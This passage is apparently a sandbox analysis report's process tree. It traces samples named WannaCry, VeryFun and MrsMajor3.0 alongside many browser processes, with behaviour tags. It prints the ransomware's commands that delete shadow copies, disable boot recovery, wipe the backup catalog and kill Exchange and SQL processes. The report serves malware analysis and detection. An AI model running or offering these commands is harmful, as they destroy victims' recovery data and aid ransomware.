      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:5140
    - - C:\Windows\System32\Notepad.exe
        
        Notepad.exe C:\Users\Admin\Desktop\Rkill.txt
        5⤵
        Opens file in notepad (likely ransom note)
        
        PID:5324
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8932 /prefetch:1
    3⤵
    PID:6852
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9016 /prefetch:1
    3⤵
    PID:6860
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:1
    3⤵
    PID:2524
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11068 /prefetch:1
    3⤵
    PID:1156
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10284 /prefetch:1
    3⤵
    PID:5824
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1864 /prefetch:8
    3⤵
    PID:4472
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8248 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6416
- - C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe
    "C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5720
  - - C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
      "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SendNotifyMessage
      PID:2452
- - C:\Users\Admin\Downloads\RKill_V2.9.1.0.exe
    "C:\Users\Admin\Downloads\RKill_V2.9.1.0.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3040
  - - C:\Users\Admin\Downloads\RKill_V2.9.1.064.exe
      C:\Users\Admin\Downloads\RKill_V2.9.1.0.exe
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:5708
    - - C:\Windows\System32\Notepad.exe
        
        Notepad.exe C:\Users\Admin\Desktop\Rkill.txt
        5⤵
        Opens file in notepad (likely ransom note)
        
        PID:2564
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8252 /prefetch:1
    3⤵
    PID:6648
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8536 /prefetch:1
    3⤵
    PID:6008
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9220 /prefetch:1
    3⤵
    PID:5584
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1
    3⤵
    PID:3036
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8148 /prefetch:1
    3⤵
    PID:3600
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7872 /prefetch:1
    3⤵
    PID:5992
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8784 /prefetch:1
    3⤵
    PID:4468
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8272 /prefetch:1
    3⤵
    PID:3796
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9096 /prefetch:1
    3⤵
    PID:5648
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8492 /prefetch:1
    3⤵
    PID:5464
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9552 /prefetch:1
    3⤵
    PID:5528
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10692 /prefetch:1
    3⤵
    PID:5656
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10608 /prefetch:1
    3⤵
    PID:5332
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9560 /prefetch:1
    3⤵
    PID:5136
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10812 /prefetch:1
    3⤵
    PID:1260
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10572 /prefetch:1
    3⤵
    PID:4928
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10436 /prefetch:1
    3⤵
    PID:6052
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9184 /prefetch:1
    3⤵
    PID:4020
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1788 /prefetch:1
    3⤵
    PID:5000
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9972 /prefetch:1
    3⤵
    PID:6708
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=112 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10748 /prefetch:1
    3⤵
    PID:6796
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9440 /prefetch:1
    3⤵
    PID:3256
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11024 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2940
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10636 /prefetch:1
    3⤵
    PID:3804
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4544 /prefetch:8
    3⤵
    PID:5076
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7556 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5092
- - C:\Users\Admin\Downloads\WannaCry.exe
    "C:\Users\Admin\Downloads\WannaCry.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:6936
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 180321729634137.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:6332
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo c.vbs
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1844
  - - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
      !WannaDecryptor!.exe f
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2884
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im MSExchange*
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5156
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im Microsoft.Exchange.*
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4732
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im sqlserver.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:100
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im sqlwriter.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4276
  - - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
      !WannaDecryptor!.exe c
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:5640
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c start /b !WannaDecryptor!.exe v
      4⤵
      System Location Discovery: System Language Discovery
      PID:6564
    - - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
        
        !WannaDecryptor!.exe v
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:7048
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1812
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:7072
  - - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
      !WannaDecryptor!.exe
      4⤵
      Executes dropped EXE
      Sets desktop wallpaper using registry
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4360
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=120 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8448 /prefetch:1
    3⤵
    PID:6176
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8896 /prefetch:1
    3⤵
    PID:3028
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=122 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11220 /prefetch:1
    3⤵
    PID:244
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8316 /prefetch:1
    3⤵
    PID:4056
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8696 /prefetch:1
    3⤵
    PID:6864
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10232 /prefetch:1
    3⤵
    PID:5756
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9228 /prefetch:8
    3⤵
    PID:5700
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6364 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4764
- - C:\Users\Admin\Downloads\VeryFun.exe
    "C:\Users\Admin\Downloads\VeryFun.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3676
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:6972
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      Adds autorun key to be loaded by Explorer.exe on startup
      Modifies WinLogon for persistence
      Boot or Logon Autostart Execution: Active Setup
      Manipulates Digital Signatures
      Adds Run key to start application
      Checks whether UAC is enabled
      Installs/modifies Browser Helper Object
      Modifies WinLogon
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Modifies Internet Explorer start page
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      System policy modification
      PID:6596
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:3712
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:6784
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:6176
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=130 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10744 /prefetch:1
    3⤵
    PID:6808
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7700 /prefetch:8
    3⤵
    PID:6020
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7484 /prefetch:8
    3⤵
    PID:6736
- - C:\Users\Admin\Downloads\MrsMajor3.0.exe
    "C:\Users\Admin\Downloads\MrsMajor3.0.exe"
    3⤵
    PID:4880
  - - C:\Windows\system32\wscript.exe
      "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6594.tmp\6595.tmp\6596.vbs //Nologo
      4⤵
      PID:6792
    - - C:\Users\Admin\AppData\Local\Temp\6594.tmp\eulascr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6594.tmp\eulascr.exe"
        5⤵
        
        PID:6616
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7244 /prefetch:1
    3⤵
    PID:4216
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=134 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
    3⤵
    PID:4636
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=135 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
    3⤵
    PID:2904
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=136 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10020 /prefetch:1
    3⤵
    PID:6396
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=137 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1132 /prefetch:1
    3⤵
    PID:6388
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=138 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9568 /prefetch:1
    3⤵
    PID:4320
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=139 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7312 /prefetch:1
    3⤵
    PID:3296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
